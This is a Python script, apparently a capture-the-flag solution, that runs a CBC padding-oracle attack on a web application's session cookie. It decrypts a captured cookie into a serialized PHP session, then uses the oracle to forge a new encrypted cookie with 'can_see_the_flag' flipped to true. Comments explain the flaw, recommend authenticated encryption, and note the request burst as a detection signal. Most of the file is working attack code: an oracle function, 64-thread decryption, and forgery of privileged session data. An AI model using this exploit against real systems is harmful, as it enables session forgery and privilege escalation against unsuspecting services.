from padding_oracle import encrypt, decrypt, base64_encode, base64_decode, urlencode, urldecode
import requests
# The session cookie as captured from the target application: a base64 string
# that has additionally been URL-encoded for transport.  This page-specific value
# is the CBC ciphertext the rest of the script works on.
session = 'ZhGw1aD3RzOX%2FliA7Qu1%2FMOqr%2Fa6jB2fN1Cj09yRwfPJkgUEZnhkpmpq5FenYBQLeyED%2BnY1DH0qPkvjcyhIqMjrYVagGRl6OaXs5cwCH2s%3D' # target this
# define the oracle
# A single shared Session so the many oracle requests reuse pooled connections
# instead of opening a new one per query.
sess = requests.Session() # connection pooling
def oracle(ciphertext: bytes) -> bool:
    """Report whether the server accepts *ciphertext* as a well-padded session.

    The candidate ciphertext is sent as the ``session`` cookie; the server is
    taken to have accepted it unless the reply body contains ``'session error'``.
    That observable difference between "padding OK" and "padding bad" is the
    entire side channel: CBC with unauthenticated padding turns any such error
    signal into a decryption (and, as this script shows, a forgery) oracle.
    The server-side fix is authenticated encryption -- an AEAD mode, or
    encrypt-then-MAC verified before decryption -- so a tampered cookie is
    rejected with one uniform error before padding is ever examined.
    """
    response = sess.get(
        'http://localhost:8887',
        cookies={'session': base64_encode(ciphertext)},
    )
    padding_rejected = 'session error' in response.text
    return not padding_rejected
# Undo the two transport encodings (URL-encoding, then base64) to recover the raw
# ciphertext bytes; the printed length is expected to be a multiple of the block
# size if the cookie really is plain CBC output.
encoded_cookie = urldecode(session)
ciphertext = base64_decode(encoded_cookie)
print(ciphertext, len(ciphertext))
block_size = 16  # 16-byte blocks, i.e. the block size of the cipher in use
# Drive the padding_oracle helper with 64 worker threads; its internals are not
# shown here, but every recovered byte costs a batch of oracle queries, so the
# server sees a large burst of requests -- a useful detection signal.
decrypted = decrypt(ciphertext, block_size, oracle, num_threads=64)
print(decrypted)
# Hard-coded copy of the recovered plaintext (presumably pasted in from an earlier
# run); it overwrites the value computed just above.  The trailing six 0x06 bytes
# are PKCS#7 padding that brings the 58-byte payload up to 64 bytes.
decrypted = b'a:2:{s:4:"name";s:6:"djosix";s:16:"can_see_the_flag";b:0;}\x06\x06\x06\x06\x06\x06'
# Forged plaintext: the same serialized session with can_see_the_flag set to 1.
# Re-encrypting it needs no key because the oracle is reused for encryption; this
# is only possible because the cookie carries no integrity tag -- a MAC or AEAD
# tag would make any such edit detectable before it is deserialized.
modified = b'a:2:{s:4:"name";s:6:"djosix";s:16:"can_see_the_flag";b:1;}' # set can_see_the_flag to 1
encrypted = encrypt(modified, block_size, oracle, 64)
print(encrypted)
# Re-apply the transport encodings in the order the application expects them.
encoded = base64_encode(encrypted)
print(encoded)
print(urlencode(encoded))